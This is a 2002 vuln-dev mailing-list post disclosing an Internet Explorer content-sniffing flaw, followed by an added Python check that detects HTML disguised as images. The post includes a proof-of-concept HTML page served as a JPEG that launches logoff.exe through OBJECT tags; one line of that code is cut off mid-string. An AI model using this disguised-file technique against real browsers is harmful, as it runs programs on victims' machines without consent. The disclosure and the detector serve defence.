Rather large MSIE-hole
From: Magnus Bodin (magnus@bodin.org)
Date: 03/12/02
- Previous message: Gushterul: "Re: compress(vul) + ftpd(?)"
- Next in thread: Jon Zobrist: "Re: Rather large MSIE-hole"
- Reply: Jon Zobrist: "Re: Rather large MSIE-hole"
- Reply: foo BAR: "Re: Rather large MSIE-hole"
- Reply: Suresh P: "Disabling the MSIE hole."
- Reply: Magnus Bodin: "Re: Rather large MSIE-hole"
- Reply: Jim Harrison (SPG): "RE: Rather large MSIE-hole"
- Reply: Maarten Oosterink: "RE: Rather large MSIE-hole"
- Reply: Slow2Show: "Re: Rather large MSIE-hole"
- Reply: Eric V Brown: "Re: Rather large MSIE-hole"
- Reply: Wall, Kevin: "RE: Rather large MSIE-hole"
- Reply: Paul D. Campbell: "Re: Rather large MSIE-hole"
- Reply: Slow2Show: "Re: Rather large MSIE-hole"
- Reply: Slow2Show: "Re: Rather large MSIE-hole"
- Reply: John Swensson: "RE: Rather large MSIE-hole"
- Reply: The Blueberry: "Re: Rather large MSIE-hole"
- Reply: Keith Tyler: "RE: Rather large MSIE-hole"
- Reply: Slow2Show: "Re: Rather large MSIE-hole"
- Reply: NoCoNFLiC: "FW: [Re: Rather large MSIE-hole] another variant"
- Reply: Tiago Halm: "RE: Rather large MSIE-hole"
Date: Tue, 12 Mar 2002 11:32:20 +0100
From: Magnus Bodin <magnus@bodin.org>
To: vuln-dev@securityfocus.com
The latest MSIE-hole is now spreading.
The attached HTML code is served as a JPEG file, and as MSIE ignores the
Content-Type if it "thinks" it knows better, the code is executed.
In combination with the malicious code that it is possible to run,
an "innocent.jpg" with the following content will log off an XP user.
--%< cut here-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>
var programName=new Array(
'c:/windows/system32/logoff.exe',
'c:/winxp/system32/logoff.exe',
'c:/winnt/system32/logoff.exe'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME='X'
CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
oPopBody.innerHTML=html;
oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
--%< cut here-----
--
magnus MICROS~1 BOB was written in Lisp.
http://x42.com/
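
Added example, not part of the original post: a server-side check that flags content labelled as an image whose leading bytes are HTML, the mismatch the message describes, together with the response header that tells a browser not to override the declared type. The function names, the 256-byte inspection window and the sample bytes are assumptions constructed for illustration.

```python
# Added example (not from the original post): flag uploads or responses that
# are labelled as an image but whose bytes a content-sniffing browser could
# treat as HTML.
import re

# Leading magic bytes for the image types this check accepts.
IMAGE_MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}

# Assumption: how many leading bytes to inspect for markup; adjust per policy.
SNIFF_WINDOW = 256

# Tags that indicate an HTML document or active content.
HTML_MARKERS = re.compile(
    rb"<\s*(!doctype\s+html|html|head|body|script|object|iframe|meta)\b",
    re.IGNORECASE,
)

def check_declared_image(declared_type: str, body: bytes) -> list[str]:
    """Return a list of findings; an empty list means the body matches its label."""
    mime = declared_type.split(";", 1)[0].strip().lower()
    magics = IMAGE_MAGIC.get(mime)
    if magics is None:
        return [f"unsupported declared type: {mime}"]
    findings = []
    if not body.startswith(magics):
        findings.append("magic bytes do not match declared type")
    # A file can carry valid magic bytes and still embed markup right after them.
    if HTML_MARKERS.search(body[:SNIFF_WINDOW]):
        findings.append("HTML markup in leading bytes")
    return findings

def safe_image_headers(mime: str) -> dict[str, str]:
    """Response headers that tell browsers not to second-guess the label."""
    return {"Content-Type": mime, "X-Content-Type-Options": "nosniff"}

# Constructed samples: an HTML page served as a JPEG, and a minimal JPEG header.
DISGUISED = b'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\n<HTML><HEAD>'
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32

if __name__ == "__main__":
    print(check_declared_image("image/jpeg", DISGUISED))
    print(check_declared_image("image/jpeg", REAL_JPEG))
```
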